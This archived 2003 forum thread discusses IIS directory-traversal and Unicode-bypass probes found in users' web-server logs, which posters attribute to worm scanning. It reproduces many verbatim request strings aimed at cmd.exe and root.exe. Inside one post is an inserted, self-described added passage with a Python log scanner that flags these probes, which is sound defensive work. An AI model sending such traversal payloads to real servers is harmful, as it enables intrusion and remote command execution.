Valhalla Legends Archive

General => General Discussion => Topic started by: UserLoser on September 08, 2003, 07:35 PM

Title: uber-l33t h4x0r
Post by: UserLoser on September 08, 2003, 07:35 PM
Found this in the log of the web server running on my computer. I found it funny ;D

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
Title: Re:uber-l33t h4x0r
Post by: Yoni on September 08, 2003, 07:46 PM
Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.
Title: Re:uber-l33t h4x0r
Post by: Grok on September 08, 2003, 08:07 PM
vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both the parent paths and Unicode bypass exploits at the same time.

The MSADC is an exploitable sample site that is installed with IIS4 and IIS5, which allows increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.
Title: Re:uber-l33t h4x0r
Post by: UserLoser on September 08, 2003, 08:43 PM
Hmm, I'm only on Windows XP Home Edition, and that's an Abyss Web Server (http://www.aprelium.com). I don't think by doing that they can confuse the server or get past it or whatever, but I don't know anything about website/server cracking.
Title: Re:uber-l33t h4x0r
Post by: iago on September 08, 2003, 08:50 PM
I scanned his IP with Thing's scanner, found nothing sadly :(
Title: Re:uber-l33t h4x0r
Post by: UserLoser on September 08, 2003, 08:55 PM
My IP or his? ;)
Title: Re:uber-l33t h4x0r
Post by: iago on September 08, 2003, 08:59 PM
I only see one IP... assumed it was his :P
Title: Re:uber-l33t h4x0r
Post by: UserLoser on September 08, 2003, 08:59 PM
Oh it is his, but I thought since you're a moderator, you could have gotten my IP :P
Title: Re:uber-l33t h4x0r
Post by: Thing on September 09, 2003, 07:48 AM
Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file.  Here is a small portion of that file:
63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
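Grok's reading of the ..%255c../ probes (double-encoded parent paths plus the Unicode bypass) and Thing's description of $torm's script that pulls these entries out of an Apache access log both come down to one check: decode the request path the way a vulnerable IIS would, then see whether it reaches cmd.exe or root.exe or climbs above the web root. The Python below is an added example written for this page; it is not $torm's script or any code from the thread. It parses Apache common-log lines, applies a second percent-decoding pass (the IIS double-decode bug, so %255c ends up as a backslash) and a deliberately lax two-byte UTF-8 decode (modelled on the overlong-sequence bug, so %c0%af becomes / and %c1%1c becomes \; ignoring the top bits of the trail byte is an assumption about that decoder, and the only reading under which the thread's %c0%2f and %c1%1c probes mean anything), and finally resolves the .. segments. The log lines embedded in it are constructed, with RFC 5737 placeholder addresses, and the names Probe, iis_lax_decode, classify, scan_log and sources are chosen here.

```python
"""Find IIS traversal / cmd.exe probes in an Apache-style access log (added example)."""
import re
from dataclasses import dataclass
from urllib.parse import unquote_to_bytes

# Constructed sample log in Apache common log format; addresses are RFC 5737 placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
192.0.2.10 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
192.0.2.10 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
198.51.100.7 - - [08/Sep/2003:02:05:00 -0500] "GET /index.html HTTP/1.0" 200 1234
198.51.100.7 - - [08/Sep/2003:02:05:01 -0500] "GET /images/logo.png HTTP/1.0" 200 5678
"""

# %h %l %u %t "%r" %>s %b; the protocol is optional because some clients (and some
# of the probes in the thread) send a bare "GET /path" request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>[^"\s]+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Binaries the probes try to reach; reaching one is a command-execution attempt
# however the path was encoded.
TARGETS = {"cmd.exe", "root.exe"}


@dataclass
class Probe:
    ip: str
    timestamp: str
    raw_url: str
    decoded_path: str
    reasons: list


def parse_line(line):
    """Return the fields of one common-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def iis_lax_decode(path):
    """Decode a request path the way the vulnerable IIS versions did (model, see comments)."""
    once = unquote_to_bytes(path)          # ordinary percent-decoding, as any server does
    twice = unquote_to_bytes(once)         # IIS decoded again after canonicalising: %255c -> %5c -> '\'
    out = bytearray()
    i = 0
    while i < len(twice):
        b = twice[i]
        # Overlong two-byte UTF-8 with a 0xC0/0xC1 lead byte. Real UTF-8 rejects it; the
        # model assumes the decoder took the low 6 bits of the trail byte unchecked, which is
        # what turns %c0%af / %c0%2f into '/' and %c1%9c / %c1%1c into '\'.
        if b in (0xC0, 0xC1) and i + 1 < len(twice):
            out.append(((b & 0x1F) << 6) | (twice[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def resolve(decoded):
    """Split a decoded path on / or \\ and resolve '..'; report whether it climbs above the root."""
    segs, escapes = [], False
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segs:
                segs.pop()
            else:
                escapes = True
        else:
            segs.append(seg)
    return segs, escapes


def classify(url):
    """Return (decoded path, list of reasons); an empty list means the request looks benign."""
    path, _, _query = url.partition("?")
    decoded = iis_lax_decode(path)
    segs, escapes = resolve(decoded)
    reasons = []
    if segs and segs[-1].lower() in TARGETS:
        reasons.append("targets " + segs[-1].lower())
    if escapes:
        reasons.append("traverses above the web root")
    return decoded, reasons


def scan_log(text):
    """Return a Probe for every log line whose decoded path is a traversal or cmd/root.exe request."""
    probes = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        decoded, reasons = classify(rec["url"])
        if reasons:
            probes.append(Probe(rec["ip"], rec["ts"], rec["url"], decoded, reasons))
    return probes


def sources(probes):
    """Count probe lines per client address; an infected host sends the whole list in one burst."""
    counts = {}
    for p in probes:
        counts[p.ip] = counts.get(p.ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for p in hits:
        print(f"{p.ip} {p.timestamp} {p.raw_url} -> {p.decoded_path!r}: {', '.join(p.reasons)}")
    print(sources(hits))
```

To use it on a real log, feed the contents of access_log to scan_log instead of SAMPLE_LOG. Because the decision is made on the decoded path rather than on a fixed string, a variant such as Fr0z3N's ..%255c%255c.. line is caught without adding a signature for it. The 404 and 400 responses on every line in the thread mean the probes failed against a non-IIS server; the useful output is the list of source addresses, which is what you would record or block.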
Title: Re:uber-l33t h4x0r
Post by: UserLoser on September 09, 2003, 03:30 PM
Nobody infects my computer!
Title: Re:uber-l33t h4x0r
Post by: Fr0z3N on September 10, 2003, 08:38 PM
134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Only one I saw. But I'm too lazy to look through them all.

On Apache. Thing, wanna send me that file by $torm? :D
Title: Re:uber-l33t h4x0r
Post by: Thing on September 10, 2003, 09:19 PM
Quote: "On Apache. Thing, wanna send me that file by $torm?"
You should ask him.  He wrote it.
Title: Re:uber-l33t h4x0r
Post by: Fr0z3N on September 11, 2003, 06:43 AM
Where would I see him to ask?
Title: Re:uber-l33t h4x0r
Post by: Thing on September 11, 2003, 07:51 AM
PM this (http://forum.valhallalegends.com/phpbbs/index.php?action=viewprofile;user=St0rm.iD) guy.